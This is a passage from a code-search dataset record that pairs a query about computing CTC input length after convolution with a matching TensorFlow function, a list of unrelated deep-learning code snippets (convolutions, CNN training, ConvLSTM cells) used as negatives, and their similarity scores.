x.detach()\n\n\t\tpred, correct = net(x, x_label, att, att_label, False)\n\t\tcorrect = correct.sum().data[0] # multi-gpu\n\n\t\t# preds = torch.cat(preds, dim= 1)\n\t\tacc = correct / ( x_label.size(0) * x_label.size(1) )\n\t\taccs.append(acc)\n\n\t\t# if np.random.randint(10)<1:\n\t\t# \tprint(pred[0].cpu().data.numpy(), att_label[0].cpu().data.numpy())\n\tprint(accs)\n\n\t# compute the distribution of 600/episodesz episodes acc.\n\tglobal best_accuracy\n\taccuracy = np.array(accs).mean()\n\tprint('<<<<<<<<< %d way accuracy:'%n_way, accuracy, 'best accuracy:', best_accuracy, '>>>>>>>>')\n\n\tif accuracy > best_accuracy:\n\t\tbest_accuracy = accuracy\n\t\ttorch.save(net.state_dict(), mdl_file)\n\t\tprint('Saved to checkpoint:', mdl_file)\n\n\treturn accuracy", "def inference():\n inf_dataset = dataset\n net.eval()\n frames_gen, frame_cnt, rel_props, prop_ticks, prop_scaling = inf_dataset[index]\n \n num_crop = args.test_crops\n length = 3\n if args.modality == 'Flow':\n length = 10\n elif args.modality == 'RGBDiff':\n length = 18\n \n # First get the base_out outputs\n base_output = torch.autograd.Variable(torch.zeros((num_crop, frame_cnt, base_out_dim)).cuda(),\n volatile=True)\n cnt = 0\n for frames in frames_gen:\n # frames.shape == [frame_batch_size * num_crops * 3, 224, 224]\n # frame_batch_size is 4 by default\n input_var = torch.autograd.Variable(frames.view(-1, length, frames.size(-2), frames.size(-1)).cuda(),\n volatile=True)\n base_out = net(input_var, None, None, None, None)\n bsc = base_out.view(num_crop, -1, base_out_dim)\n base_output[:, cnt:cnt+bsc.size(1), :] = bsc\n cnt += bsc.size(1)\n\n n_frames = base_output.size(1)\n assert frame_cnt == n_frames\n # GLCU\n step_features = base_output.mean(dim=0).mean(dim=0).unsqueeze(0)\n gate, glcu_task_pred = net.glcu(step_features)\n glcu_task_pred = F.softmax(glcu_task_pred.squeeze(), dim=0).data.cpu().numpy()\n gate = gate.repeat(1, num_crop * n_frames).view(num_crop, n_frames, base_out_dim)\n if net.additive_glcu:\n base_output = base_output + gate\n else:\n base_output = base_output * gate\n\n # output.shape == [num_frames, 7791]\n output = torch.zeros((frame_cnt, output_dim)).cuda()\n cnt = 0\n for i in range(0, frame_cnt, 4):\n base_out = base_output[:, i:i+4, :].contiguous().view(-1, base_out_dim)\n rst = net.test_fc(base_out)\n sc = rst.data.view(num_crop, -1, output_dim).mean(dim=0)\n output[cnt: cnt + sc.size(0), :] = sc\n cnt += sc.size(0)\n base_output = base_output.mean(dim=0).data\n\n # act_scores.shape == [num_proposals, K+1]\n # comp_scores.shape == [num_proposals, K]\n act_scores, comp_scores, reg_scores = reorg_stpp.forward(output, prop_ticks, prop_scaling)\n act_scores = torch.autograd.Variable(act_scores, volatile=True)\n comp_scores = torch.autograd.Variable(comp_scores, volatile=True)\n\n # Task Head\n combined_scores = F.softmax(act_scores[:, 1:], dim=1) * torch.exp(comp_scores)\n combined_scores = combined_scores.mean(dim=0).unsqueeze(0)\n task_pred = F.softmax(net.task_head(combined_scores).squeeze(), dim=0).data.cpu().numpy()\n\n act_scores = act_scores.data\n comp_scores = comp_scores.data\n\n if reg_scores is not None:\n reg_scores = reg_scores.view(-1, num_class, 2)\n reg_scores[:, :, 0] = reg_scores[:, :, 0] * stats[1, 0] + stats[0, 0]\n reg_scores[:, :, 1] = reg_scores[:, :, 1] * stats[1, 1] + stats[0, 1]\n\n torch.cuda.empty_cache() # To empty the cache from previous iterations\n\n # perform stpp on scores\n return ((inf_dataset.video_list[index].id,\n (rel_props.numpy(), act_scores.cpu().numpy(), comp_scores.cpu().numpy(), reg_scores.cpu().numpy(), \n glcu_task_pred, task_pred),\n output.cpu().numpy(),\n base_output.cpu().numpy()))", "def _comput_PSNR(self, input, target):\n shave = 4\n ch, h, w = input.size()\n input_Y = rgb2ycbcrT(input.cpu())\n target_Y = rgb2ycbcrT(target.cpu())\n diff = (input_Y - target_Y).view(1, h, w)\n\n diff = diff[:, shave:(h - shave), shave:(w - shave)]\n mse = diff.pow(2).mean()\n psnr = -10 * np.log10(mse)\n return psnr" ]
[ "0.6702836", "0.60820144", "0.57397383", "0.5513961", "0.5449203", "0.5389235", "0.53726816", "0.5317791", "0.5255269", "0.5254749", "0.5192296", "0.517288", "0.51403135", "0.5121367", "0.51208645", "0.51208645", "0.511794", "0.51084936", "0.5106065", "0.5099034", "0.5092202", "0.5073547", "0.50673836", "0.50488716", "0.50338435", "0.502055", "0.5012428", "0.501089", "0.5002971", "0.49716663", "0.49546856", "0.49401686", "0.49401686", "0.4932358", "0.49209988", "0.49204868", "0.49184752", "0.4916693", "0.49037102", "0.48946956", "0.48838368", "0.48787674", "0.48730496", "0.48694572", "0.48672712", "0.48630452", "0.4860934", "0.48596287", "0.4851591", "0.48455057", "0.48454162", "0.48446012", "0.4840251", "0.48401853", "0.48350665", "0.4833516", "0.48317856", "0.48277622", "0.4827165", "0.48258263", "0.48231295", "0.48189723", "0.48168334", "0.48123232", "0.48073128", "0.47961852", "0.47952184", "0.47950086", "0.47944933", "0.47925803", "0.47901708", "0.47809064", "0.47799984", "0.47758543", "0.4772516", "0.47709933", "0.47695166", "0.47684658", "0.47676653", "0.4765633", "0.4762571", "0.47583732", "0.4757198", "0.47555423", "0.47536805", "0.4739716", "0.47355884", "0.47350612", "0.47327983", "0.4725364", "0.47251174", "0.4724747", "0.4724747", "0.4724747", "0.47242233", "0.47237417", "0.47237417", "0.47237417", "0.47230917", "0.4720603", "0.4719385" ]
0.0
-1
Computes the time_steps/ctc_input_length after convolution.
def compute_length_after_conv(max_time_steps, ctc_time_steps, input_length): max_time_steps = tf.cast(max_time_steps, dtype=tf.float32) ctc_input_length = tf.cast(tf.multiply(input_length, ctc_time_steps), dtype=tf.float32) return tf.cast(tf.floordiv(ctc_input_length, max_time_steps), dtype=tf.int32)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_length_after_conv(max_time_steps, ctc_time_steps, input_length) -> tf.Tensor:\n return tf.to_int32(tf.floordiv(\n tf.to_float(tf.multiply(input_length, ctc_time_steps)), tf.to_float(max_time_steps)))", "def _calc_ctc_input_length(args):\n # py2 needs explicit tf import for keras Lambda layer\n import tensorflow as tf\n\n input_length, input_data, y_pred = args\n max_time_steps = tf.shape(input_data)[1]\n ctc_time_steps = tf.shape(y_pred)[1]\n ctc_input_length = tf.multiply(\n tf.to_float(input_length), tf.to_float(ctc_time_steps))\n ctc_input_length = tf.to_int32(tf.floordiv(\n ctc_input_length, tf.to_float(max_time_steps)))\n return ctc_input_length", "def _cconvolve(x, H, nfft, wlen, axis):\n \n # pad with wlen-1 zeros for overlap & FFT\n x = pad_along_axis(x, [0, wlen - 1], axis=axis)\n xf = np.fft.rfft(x, nfft, axis=axis)\n \n # take product with window in freq. domain\n product = multiply_along_axis(xf, H, axis=axis)\n\n # back transform to sample domain and return\n return np.fft.irfft(product, axis=axis).real", "def compute_conv(in_size, kernel, stride, padding):\n return (in_size + 2 * padding - kernel) // stride + 1", "def convolve(signal, filter):\r\n\r\n # Make the signal and filter the correct size\r\n padded_signal, padded_filter = preprocess(signal, filter) # Constant time\r\n fft_signal = fft(padded_signal) # Log(n) complexity\r\n fft_filter = fft(padded_filter) # Log(n) complexity\r\n filtered_signal = np.multiply(fft_signal, fft_filter) # Element wise multiply (p multiplies)\r\n time_signal = inverse_fft(filtered_signal) # O(N^2)\r\n # Remove excess zeros\r\n time_signal = postprocess(time_signal, signal.size, filter.size) # O(N)\r\n print(\"Done Filtering\")\r\n # return np.convolve(filter, signal) # Replace with your fft implementation\r\n return time_signal", "def calculate_ctc_loss(label_length, ctc_input_length, labels, logits):\n ctc_input_length = tf.to_int32(ctc_input_length)\n sparse_labels = transfer2sparse(label_length, labels)\n return tf.reduce_mean(tf.nn.ctc_loss(labels=sparse_labels, inputs=logits, sequence_length=ctc_input_length))", "def time_conv_layer(model, nb_filters):\n\n model = Conv1D(filters=nb_filters, kernel_size=3, padding='causal', activation='relu')(model)\n model = BatchNormalization()(model)\n return model", "def TCN(input_dim): \r\n # Number of dilations in order to use for the temporal blocks.\r\n dilations = np.array([1, 2, 4, 8, 16, 32])\r\n\r\n input_dim.insert(0,1)\r\n print(f\"input_dim: {input_dim}\")\r\n input_layer = Input(shape=input_dim)\r\n cropping = 0\r\n assert (sum(dilations) * block_size + 1) == 127, \"Paper specifies receptive field size should be 127\"\r\n \r\n prev_layer, skip_layer, _ = add_temporal_block(input_layer, None, 1, 1, cropping)\r\n \r\n for dilation in dilations:\r\n prev_layer, skip_layer, cropping = add_temporal_block(prev_layer, skip_layer, 2, dilation, cropping)\r\n\r\n output_layer = PReLU(shared_axes=[2, 3])(skip_layer)\r\n output_layer = SpectralNormalization(Conv1D(fixed_filters, kernel_size=1))(output_layer)\r\n output_layer = PReLU(shared_axes=[2, 3])(output_layer)\r\n output_layer = SpectralNormalization(Conv1D(1, kernel_size=1))(output_layer)\r\n\r\n return Model(input_layer, output_layer)", "def clConvolution(self, size, mask):", "def test_temporalconv():\n batch_size = 10\n sequence_length = 5\n\n number_of_nodes = 300\n in_channels = 100\n edge_per_node = 15\n out_channels = 10\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n batch, _, _, _ = create_mock_batch(\n batch_size,\n sequence_length,\n number_of_nodes,\n edge_per_node,\n in_channels,\n out_channels,\n )\n\n kernel_size = 3\n temporal_conv = TemporalConv(\n in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size\n ).to(device)\n\n H = temporal_conv(batch.to(device))\n assert H.shape == (\n batch_size,\n sequence_length - (kernel_size - 1),\n number_of_nodes,\n out_channels,\n )", "def call(self, input):\n for r in range(self.tile_num):\n for c in range(self.tile_num):\n # do frequency conv on each tile\n offset = [[r*self.tile_size+self.tile_size/2, c*self.tile_size+self.tile_size/2] for i in range(BATCHSIZE)]\n input_tile = tf.image.extract_glimpse(input, \n [self.tile_size, self.tile_size],\n offset, centered=False, normalized=False) \n pad_pixels = (self.fft_size - self.tile_size) / 2\n input_tile = tf.image.pad_to_bounding_box(\n input_tile, pad_pixels, pad_pixels, self.fft_size, self.fft_size)\n\n input_tile = tf.transpose(input_tile, perm=[0,3,1,2])\n input_fft = tf.spectral.fft2d(tf.cast(input_tile, tf.complex64))\n output_fft = tf.multiply(self.kernel_freq, input_fft[0,:])\n output_fft_accum = tf.reduce_sum(output_fft, 1)\n output_batch_i = tf.spectral.ifft2d(output_fft_accum)\n bias_expand = tf.expand_dims(tf.expand_dims(self.bias, 1),1)\n output_tile_accum = tf.expand_dims(tf.real(output_batch_i) + bias_expand, 0)\n for b in range(1,BATCHSIZE):\n output_fft = tf.multiply(self.kernel_freq, input_fft[b,:])\n output_fft_accum = tf.reduce_sum(output_fft, 1)\n output_fft_batch_i = tf.spectral.ifft2d(output_fft_accum)\n bias_expand = tf.expand_dims(tf.expand_dims(self.bias, 1),1)\n output_tile_accum = tf.concat([output_tile_accum, \n tf.expand_dims(tf.real(output_fft_batch_i) + bias_expand, 0)],0)\n\n # Concat col tiles\n output_accum_col = output_tile_accum\n if c != 0:\n overlap = output_accum_col[:,:,:,-pad_pixels:] + output_tile_accum[:,:,:,0:pad_pixels]\n output_accum_col = tf.concat([output_accum_col[:,:,:,0:-pad_pixels], \n overlap, \n output_tile_accum[:,:,:,pad_pixels:]], \n 3)\n # Concat tow output tiles\n output_accum = output_accum_col\n if r != 0:\n overlap = output_accum[:,:,-pad_pixels:,:] + output_accum_col[:,:,0:pad_pixels,:]\n output_accum = tf.concat([output_accum[:,:,0:-pad_pixels,:], \n overlap, \n output_accum_col[:,:,pad_pixels:,:]], \n 2)\n\n output_accum = tf.transpose(output_accum, perm=[0,2,3,1])\n return tf.image.crop_to_bounding_box(output_accum, 0, 0, self.img_size, self.img_size)", "def time_cnn():\n\n data_dir = \"/home/liyanzeng/git/Var-CNN--DynaFlow/preprocess\"\n\n # read in data from numpy files\n train_metadata = np.load(r\"%s/train_metadata.npy\" % data_dir)\n test_metadata = np.load(r\"%s/test_metadata.npy\" % data_dir)\n train_seq = np.load(r\"%s/train_seq.npy\" % data_dir)\n train_labels = np.load(r\"%s/train_labels.npy\" % data_dir)\n test_seq = np.load(r\"%s/test_seq.npy\" % data_dir)\n test_labels = np.load(r\"%s/test_labels.npy\" % data_dir)\n\n # apply normalization to metadata\n metadata_scaler = StandardScaler()\n train_metadata = metadata_scaler.fit_transform(train_metadata)\n test_metadata = metadata_scaler.transform(test_metadata)\n\n # extract sequences\n train_time, train_time_dleft, train_time_dright, train_dir = np.split(train_seq, 4, axis=2)\n test_time, test_time_dleft, test_time_dright, test_dir = np.split(test_seq, 4, axis=2)\n\n # reshape to be able to normalize\n train_time = np.reshape(train_time, (train_time.shape[0], train_time.shape[1]))\n test_time = np.reshape(test_time, (test_time.shape[0], test_time.shape[1]))\n train_time_dleft = np.reshape(train_time_dleft, (train_time_dleft.shape[0], train_time_dleft.shape[1]))\n test_time_dleft = np.reshape(test_time_dleft, (test_time_dleft.shape[0], test_time_dleft.shape[1]))\n train_time_dright = np.reshape(train_time_dright, (train_time_dright.shape[0], train_time_dright.shape[1]))\n test_time_dright = np.reshape(test_time_dright, (test_time_dright.shape[0], test_time_dright.shape[1]))\n\n # apply normalization to packet time data according to scaling computed on train timestamp data\n time_scaler = StandardScaler()\n train_time = time_scaler.fit_transform(train_time)\n test_time = time_scaler.transform(test_time)\n train_time_dleft = time_scaler.transform(train_time_dleft)\n test_time_dleft = time_scaler.transform(test_time_dleft)\n train_time_dright = time_scaler.transform(train_time_dright)\n test_time_dright = time_scaler.transform(test_time_dright)\n\n train_seq = np.stack((train_time, train_time_dleft, train_time_dright), axis=-1)\n test_seq = np.stack((test_time, test_time_dleft, test_time_dright), axis=-1)\n\n # construct CNN\n cnn_input = Input(shape=(seq_length, 3,), name='cnn_input')\n cnn_model = time_conv_block(cnn_input, 2, 4)\n cnn_model = time_conv_block(cnn_model, 2, 8)\n cnn_model = time_conv_block(cnn_model, 2, 8)\n cnn_model = time_conv_block(cnn_model, 3, 16)\n cnn_model = time_conv_block(cnn_model, 3, 16)\n cnn_output = Flatten()(cnn_model)\n cnn_output = dense_layer(cnn_output, 1024, 0.4)\n\n # construct MLP for metadata\n metadata_input = Input(shape=(7,), name='metadata_input')\n metadata_output = dense_layer(metadata_input, 32, 0.) # consider this the embedding of all the metadata\n\n # concatenate before second dense layer\n combined = Concatenate()([cnn_output, metadata_output])\n combined = dense_layer(combined, 1024, 0.5)\n\n # add final softmax layer\n if NUM_UNMON_SITES == 0: # closed-world\n combined_output = Dense(units=NUM_MON_SITES, activation='softmax', name='combined_output')(combined)\n else:\n # add extra class for unmonitored sites\n combined_output = Dense(units=NUM_MON_SITES + 1, activation='softmax', name='combined_output')(combined)\n\n model = Model(inputs=[cnn_input, metadata_input], outputs=[combined_output])\n model.compile(loss='categorical_crossentropy',\n optimizer=Adam(0.001),\n metrics=['accuracy'])\n\n training_data = ({'cnn_input': train_seq,\n 'metadata_input': train_metadata},\n {'combined_output': train_labels})\n\n test_data = ({'cnn_input': test_seq,\n 'metadata_input': test_metadata},\n {'combined_output': test_labels})\n\n lr_modifier = LearningRateScheduler(schedule=lr_scheduler)\n\n # train model\n train_time_start = time.time()\n model.fit(x=training_data[0],\n y=training_data[1],\n batch_size=50,\n epochs=200,\n verbose=0,\n callbacks=[lr_modifier])\n train_time_end = time.time()\n\n # compute final softmax predictions on test set and save predictions\n test_time_start = time.time()\n predictions = model.predict(test_data[0], batch_size=50, verbose=0)\n test_time_end = time.time()\n \n save_dir = \"predictions\"\n np.save(file=r\"%s/time_model\" % save_dir, arr=predictions)\n \n return (train_time_end - train_time_start), (test_time_end - test_time_start)", "def loop_conv(X, W):\n # Go over all five dimensions \n # (#batches x #channels x #height x #width x #dur/length )\n # with filter that has\n # #filters x #channels x #height x #width x #dur/length \n num_filters = W.shape[0]\n filt_channels = W.shape[1]\n filt_height = W.shape[2]\n filt_width = W.shape[3]\n filt_duration = W.shape[4]\n num_batches = X.shape[0]\n input_channels = X.shape[1]\n assert(filt_channels == input_channels)\n out_shape = compute_out_shape(X.shape, W.shape)\n out_height = out_shape[2]\n out_width = out_shape[3]\n out_duration = out_shape[4]\n \n # The output is H :)\n H = np.zeros((out_shape))\n for batch_i in xrange(0, num_batches):\n for filt_i in xrange(0, num_filters):\n for out_x in xrange(0, out_height):\n for out_y in xrange(0, out_width):\n for out_z in xrange(0, out_duration):\n for chan_i in xrange(0, filt_channels):\n for filt_x in xrange(0, filt_height):\n for filt_y in xrange(0, filt_width):\n for filt_z in xrange(0, filt_duration):\n weight = W[filt_i, chan_i, filt_x, filt_y, filt_z]\n input_val = X[batch_i, chan_i, \\\n out_x + filt_x, out_y + filt_y, out_z + filt_z]\n H[batch_i, filt_i, out_x, out_y, out_z] += \\\n weight * input_val\n return H", "def build_low_latency_conv(input_frames, input_bins, n_classes=12, dropout=0.5):\n\n from keras.layers import Conv2D, Dense, Dropout, Flatten\n input_shape = (input_frames, input_bins, 1)\n\n # In the paper there are some differences\n # uses log-mel as input instead of MFCC\n # uses 4 in stride for frequency\n # has a linear bottleneck as second layer to reduce multiplications,\n # instead of doing a single full-frequency convolution\n # probably uses ReLu for the DNN layers?\n # probably does not use ReLu for the conv layer?\n\n # Note, in keyword spotting task tstride=2,4,8 performed well also\n model = keras.Sequential([\n Conv2D(186, (input_frames, 8), strides=(1, 1),\n padding='valid', activation='relu', use_bias=True,\n input_shape=input_shape),\n Dropout(dropout),\n Flatten(),\n Dense(128, activation=None, use_bias=True),\n Dropout(dropout),\n Dense(128, activation=None, use_bias=True),\n Dropout(dropout),\n Dense(n_classes, activation='softmax', use_bias=True),\n ])\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])\n return model", "def build(self,\r\n conv_filters=196,\r\n conv_size=13,\r\n conv_strides=4,\r\n act='relu',\r\n rnn_layers=2,\r\n LSTM_units=128,\r\n drop_out=0.8):\r\n i = Input(shape=self.input_size, name='input')\r\n x = Conv1D(conv_filters,\r\n conv_size,\r\n strides=conv_strides,\r\n name='conv1d')(i)\r\n x = BatchNormalization()(x)\r\n x = Activation(act)(x)\r\n for _ in range(rnn_layers):\r\n x = Bidirectional(LSTM(LSTM_units,\r\n return_sequences=True))(x)\r\n x = Dropout(drop_out)(x)\r\n x = BatchNormalization()(x)\r\n y_pred = TimeDistributed(Dense(self.output_size,\r\n activation='softmax'))(x)\r\n # ctc inputs\r\n labels = Input(name='the_labels', shape=[None, ], dtype='int32')\r\n input_length = Input(name='input_length', shape=[1], dtype='int32')\r\n label_length = Input(name='label_length', shape=[1], dtype='int32')\r\n # Keras doesn't currently support loss funcs with extra parameters\r\n # so CTC loss is implemented in a lambda layer\r\n loss_out = Lambda(ctc_lambda_func,\r\n output_shape=(1,),\r\n name='ctc')([y_pred,\r\n labels,\r\n input_length,\r\n label_length])\r\n self.tm = Model(inputs=i,\r\n outputs=y_pred)\r\n self.m = Model(inputs=[i,\r\n labels,\r\n input_length,\r\n label_length],\r\n outputs=loss_out)\r\n return self.m, self.tm", "def conv2d(args):\n inp_ = args[0]\n kernel = args[1]\n stride = args[2]\n padding = args[3]\n (batch_size, in_channels, H, W) = inp_.shape\n (out_channels, in_channels_t, Hk, Wk) = kernel.shape\n Hc = int((H - Hk)/stride)+1\n Wc = int((W - Wk)/stride)+1\n conv_layer = np.zeros((batch_size, out_channels, Hc, Wc))\n for batch_i in range(batch_size):\n for o_chann_i in range(out_channels):\n for in_chann_i in range(in_channels):\n curr_ker = kernel[o_chann_i, in_chann_i, :, :]\n curr_inp = inp_[batch_i, in_chann_i, :, :]\n h_ind = 0\n while h_ind + Hk <= H:\n w_ind = 0\n while w_ind + Wk <= W:\n inp_patch = curr_inp[h_ind:h_ind+Hk, w_ind:w_ind+Wk]\n # Sum the conv_value of all the inp_channels\n conv_layer[batch_i, o_chann_i, h_ind//stride, w_ind//stride] += np.sum(inp_patch*curr_ker)\n w_ind+=stride\n h_ind+=stride\n return conv_layer", "def context_step(inputs, states):\n # <= batch_size, hidden_size\n c_i = K.sum(encoder_out_seq * K.expand_dims(inputs, -1), axis=1)\n if verbose:\n print('ci>', c_i.shape)\n return c_i, [c_i]", "def __call__(self, inputs):\n with tf.variable_scope('conv_t_{}'.format(self.idx)):\n activation_fn = get_act_fn(self.act_fn)\n\n if self.cfg.VAR_ON_CPU:\n kernels = variable_on_cpu(\n name='kernels',\n shape=[self.kernel_size, self.kernel_size,\n self.n_kernel, inputs.get_shape().as_list()[3]],\n initializer=self.w_init_fn,\n dtype=tf.float32)\n conv_t = tf.nn.conv2d_transpose(\n value=inputs,\n filter=kernels,\n output_shape=self.output_shape,\n strides=[1, self.stride, self.stride, 1],\n padding=self.padding)\n\n if self.use_bias:\n biases = variable_on_cpu(\n name='biases',\n shape=[self.n_kernel],\n initializer=tf.zeros_initializer(),\n dtype=tf.float32)\n conv_t = tf.nn.bias_add(conv_t, biases)\n\n if activation_fn is not None:\n conv_t = activation_fn(conv_t)\n\n else:\n biases_initializer = tf.zeros_initializer() if self.use_bias else None\n conv_t = tf.contrib.layers.conv2d_transpose(\n inputs=inputs,\n num_outputs=self.n_kernel,\n kernel_size=self.kernel_size,\n stride=self.stride,\n padding=self.padding,\n activation_fn=activation_fn,\n weights_initializer=self.w_init_fn,\n biases_initializer=biases_initializer)\n\n return conv_t", "def convolve2d(img, kernel):\n #Flip the kernel\n kernel = utils.flip2d(kernel) \n #print(len(kernel))\n \n c = copy.deepcopy(img)\n \n #print(len(c))\n #Padd the image\n pad = int((len(kernel)-1)/2)\n\n\n padded_img = utils.zero_pad(img,pad,pad)\n #print(len(padded_img), len(padded_img[0]))\n #print(len(kernel))\n #print(len(img)**2)\n og_img=[]\n#c = copy.deepcopy(img)\n j=0\n offset = 0\n for m in range(len(img) * len(img[0])): # size of kernel x kernel\n x = []\n \n for i in range(len(kernel)): #3 is kernel size\n #print(i,j)\n x.append(padded_img[i+offset][j:j+len(kernel)])\n #print((x))\n sum = 0\n for k in range(len(kernel)):\n for l in range(len(kernel[0])):\n sum+= x[k][l] * kernel[k][l]\n #print(i,j)\n #print(sum)\n og_img.append(sum) \n j+=1\n if (j == len(img[0])):\n j = 0\n offset+= 1\n \n #print(len(img), len(img[0]))\n final_img = []\n for i in range(0,(len(img)*len(img[0])),len(img[0])):\n final_img.append(og_img[i:i+len(img[0])])\n #print(len(final_img)), len(final_img[0])\n return final_img\n\n # TODO: implement this function.", "def compute_ctc_loss(self, logits, target):\n\n num_time_steps = logits.shape[0]\n num_labels = logits.shape[1] - 1\n num_labels_with_blank = num_labels + 1\n\n # sanity check to ensure targets are all right\n assert (target < num_labels).all()\n\n\t\t######################\n\t\t### YOUR CODE HERE ###\n\t\t######################\n target_length = 2 * target.shape[0] + 1\n\n normalized_logits = softmax(logits)\n alpha = self.compute_forward_variables(normalized_logits, target) \n \n return -np.log(np.sum(alpha[target_length-1, :] \\\n + alpha[target_length - 2, :], axis=0))", "def fftconvolve(array, kernel):\n x = numpy.fft.fftshift(numpy.fft.fftn(image))\n y = numpy.fft.fftshift(numpy.fft.fftn(kernel))\n\n return numpy.real(numpynp.fft.fftshift(\n numpy.fft.ifftn(numpy.fft.ifftshift(x * y))))", "def _convs_unoptimized(args, filter_size, num_features, bias, bias_start=0.0, convtype='convolution'):\n\n # Calculate the total size of arguments on dimension 1\n\n total_arg_size_depth = 0\n shapes = [a.get_shape().as_list() for a in args]\n shape_length = len(shapes[0])\n for shape in shapes:\n if len(shape) not in [3, 4, 5]:\n raise ValueError(\"Conv Linear expects 3D, 4D or 5D arguments: %s\" % str(shapes))\n if len(shape) != len(shapes[0]):\n raise ValueError(\"Conv Linear expects all args to be of same Dimension: %s\" % str(shapes))\n else:\n total_arg_size_depth += shape[-1]\n dtype = [a.dtype for a in args][0]\n\n if shape_length != 4 and convtype == \"separable\":\n print ('[ERROR] separable convLSTM is only implemented for conv2D')\n raise NotImplementedError \n\n if len(args) != 2:\n print ('LSTM is only implemented with len(args) = 2!')\n raise NotImplementedError\n\n # Determine correct conv operation\n\n c_i = shapes[0][-1] # number of input channels per tensor in args\n c_o = num_features//4 # number of output channels per gate and cell state\n\n if convtype == 'separable': \n if shape_length == 3:\n conv_op = tf.nn.separable_conv1d # ? does not exist\n strides = 1\n elif shape_length == 4:\n conv_op = tf.nn.separable_conv2d\n strides = shape_length * [1]\n elif shape_length == 5:\n conv_op = tf.nn.separable_conv3d # ? does not exist\n strides = shape_length * [1]\n else:\n raise NotImplementedError\n channel_multiplier = 1\n elif convtype == 'depthwise': \n if shape_length == 3:\n conv_op = tf.nn.depthwise_conv1d # ? does not exist\n strides = 1\n elif shape_length == 4:\n conv_op = tf.nn.depthwise_conv2d\n strides = shape_length * [1]\n elif shape_length == 5:\n conv_op = tf.nn.depthwise_conv3d # ? does not exist\n strides = shape_length * [1]\n else:\n raise NotImplementedError\n channel_multiplier = 1\n else: # Normal CONV and spatially separable CONV\n if shape_length == 3:\n conv_op = nn_ops.conv1d\n strides = 1\n elif shape_length == 4:\n conv_op = nn_ops.conv2d\n strides = shape_length * [1]\n elif shape_length == 5:\n conv_op = nn_ops.conv3d\n strides = shape_length * [1]\n else:\n raise NotImplementedError\n\n # Now the computation\n\n if convtype == 'spatial':\n # Get kernels\n\n kernel_h = vs.get_variable(\"kernel_h\", [filter_size[0], 1, total_arg_size_depth, num_features], dtype=dtype)\n print('kernel_h: ', [filter_size[0], 1, total_arg_size_depth, num_features])\n kernel_w = vs.get_variable(\"kernel_w\", [1, filter_size[1], total_arg_size_depth, num_features], dtype=dtype)\n print('kernel_w: ', [1, filter_size[1], total_arg_size_depth, num_features])\n\n W_ix_h = kernel_h[..., 0:c_i, 0:1*c_o] # Name pattern: W(eights) for i(nput gate) for h(eight) CONV with x\n W_ih_h = kernel_h[..., c_i:2*c_i, 0:1*c_o]\n W_cx_h = kernel_h[..., 0:c_i, 1*c_o:2*c_o]\n W_ch_h = kernel_h[..., c_i:2*c_i, 1*c_o:2*c_o]\n W_fx_h = kernel_h[..., 0:c_i, 2*c_o:3*c_o]\n W_fh_h = kernel_h[..., c_i:2*c_i, 2*c_o:3*c_o]\n W_ox_h = kernel_h[..., 0:c_i, 3*c_o:4*c_o]\n W_oh_h = kernel_h[..., c_i:2*c_i, 3*c_o:4*c_o]\n\n W_ix_w = kernel_w[..., 0:c_i, 0:1*c_o]\n W_ih_w = kernel_w[..., c_i:2*c_i, 0:1*c_o]\n W_cx_w = kernel_w[..., 0:c_i, 1*c_o:2*c_o]\n W_ch_w = kernel_w[..., c_i:2*c_i, 1*c_o:2*c_o]\n W_fx_w = kernel_w[..., 0:c_i, 2*c_o:3*c_o]\n W_fh_w = kernel_w[..., c_i:2*c_i, 2*c_o:3*c_o]\n W_ox_w = kernel_w[..., 0:c_i, 3*c_o:4*c_o]\n W_oh_w = kernel_w[..., c_i:2*c_i, 3*c_o:4*c_o]\n\n # input gate\n\n i_x_h = conv_op(args[0], W_ix_h, strides, padding=\"SAME\")\n i_x = conv_op(i_x_h, W_ix_w, strides, padding=\"SAME\")\n i_h_h = conv_op(args[1], W_ih_h, strides, padding=\"SAME\")\n i_h = conv_op(i_h_h, W_ih_w, strides, padding=\"SAME\")\n\n # new input (= intermediate step for new cell state)\n\n c_x_h = conv_op(args[0], W_cx_h, strides, padding=\"SAME\")\n c_x = conv_op(c_x_h, W_cx_w, strides, padding=\"SAME\")\n c_h_h = conv_op(args[1], W_ch_h, strides, padding=\"SAME\")\n c_h = conv_op(c_h_h, W_ch_w, strides, padding=\"SAME\")\n\n # forget gate\n\n f_x_h = conv_op(args[0], W_fx_h, strides, padding=\"SAME\")\n f_x = conv_op(f_x_h, W_fx_w, strides, padding=\"SAME\")\n f_h_h = conv_op(args[1], W_fh_h, strides, padding=\"SAME\")\n f_h = conv_op(f_h_h, W_fh_w, strides, padding=\"SAME\")\n\n # output gate\n\n o_x_h = conv_op(args[0], W_ox_h, strides, padding=\"SAME\")\n o_x = conv_op(o_x_h, W_ox_w, strides, padding=\"SAME\")\n o_h_h = conv_op(args[1], W_oh_h, strides, padding=\"SAME\")\n o_h = conv_op(o_h_h, W_oh_w, strides, padding=\"SAME\")\n\n # sum up results\n \n res_x = array_ops.concat(axis=shape_length - 1, values=[i_x, c_x, f_x, o_x])\n res_h = array_ops.concat(axis=shape_length - 1, values=[i_h, c_h, f_h, o_h])\n res = tf.add(res_x, res_h)\n\n elif convtype == 'depthwise':\n # Get kernels\n\n kernel_depth = vs.get_variable(\"kernel_depth\", filter_size + [total_arg_size_depth, 4*channel_multiplier],\n dtype=dtype)\n print('kernel_depth: ', filter_size + [total_arg_size_depth, 4*channel_multiplier])\n\n W_ix = kernel_depth[..., 0:c_i, 0:1*channel_multiplier]\n W_ih = kernel_depth[..., c_i:2*c_i, 0:1*channel_multiplier]\n W_cx = kernel_depth[..., 0:c_i, 1*channel_multiplier:2*channel_multiplier]\n W_ch = kernel_depth[..., c_i:2*c_i, 1*channel_multiplier:2*channel_multiplier]\n W_fx = kernel_depth[..., 0:c_i, 2*channel_multiplier:3*channel_multiplier]\n W_fh = kernel_depth[..., c_i:2*c_i, 2*channel_multiplier:3*channel_multiplier]\n W_ox = kernel_depth[..., 0:c_i, 3*channel_multiplier:4*channel_multiplier]\n W_oh = kernel_depth[..., c_i:2*c_i, 3*channel_multiplier:4*channel_multiplier]\n\n # input gate\n\n i_x = conv_op(args[0], W_ix, strides, padding=\"SAME\")\n i_h = conv_op(args[1], W_ih, strides, padding=\"SAME\")\n\n # new input (= intermediate step for new cell state)\n\n c_x = 